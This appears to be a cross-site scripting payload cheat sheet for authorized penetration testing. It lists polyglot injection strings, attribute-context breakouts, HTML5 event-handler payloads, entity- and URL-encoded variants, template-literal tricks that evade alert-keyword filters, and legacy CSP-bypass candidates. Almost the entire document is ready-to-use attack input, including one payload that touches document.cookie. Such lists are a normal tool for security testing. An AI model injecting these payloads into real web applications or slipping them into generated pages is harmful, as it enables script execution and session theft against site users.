# XSS Polyglot Payloads
# Works across multiple injection contexts simultaneously
# For authorized testing only

# ===== TIER 1 — Classic Polyglots =====
# Executes in href, src, HTML body, attribute, and JS string contexts

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>

'"><img src=x onerror=alert(1)>

'"><svg/onload=alert(1)>

\";alert(1);//

</script><script>alert(1)</script>

# ===== TIER 2 — Attribute Context Polyglots =====
# Works inside HTML attribute values

" onmouseover="alert(1)

' onmouseover='alert(1)

`onmouseover=alert(1)`

" autofocus onfocus="alert(1)

# ===== TIER 3 — HTML5 Event Polyglots =====
# Non-script HTML elements that trigger JS

<details open ontoggle=alert(1)>

<video autoplay onplay=alert(1)><source src=1></video>

<audio autoplay onplay=alert(1)><source src=1></audio>

<body onpageshow=alert(1)>

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

<marquee onstart=alert(1)>XSS</marquee>

<input autofocus onfocus=alert(1)>

<select autofocus onfocus=alert(1)>

# ===== TIER 4 — Encoding Variants =====
# HTML decimal entities
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

# HTML hex entities
<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;>

# Unicode escape (valid in JS string/identifier positions only)
<img src=x onerror=\u0061\u006C\u0065\u0072\u0074(1)>

# Double URL encoded
%253Cscript%253Ealert(1)%253C%252Fscript%253E

# ===== TIER 5 — Template Literal Payloads =====
# Bypasses alert( keyword filter using template literals

alert`1`

setTimeout`alert\x28document.cookie\x29`

Function`alert\x281\x29```

# ===== TIER 6 — CSP-Friendly Candidates =====
# Note: most of these require specific browser/config to work; verify before use

# [LEGACY] HTML imports — removed from Chrome 73+
<link rel=import href=data:text/html,<script>alert(1)</script>>

# object with data: URI — blocked in Chrome 81+ by default
<object data="data:text/html,<script>alert(1)</script>">

# meta refresh to javascript: — blocked in modern browsers as navigation
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
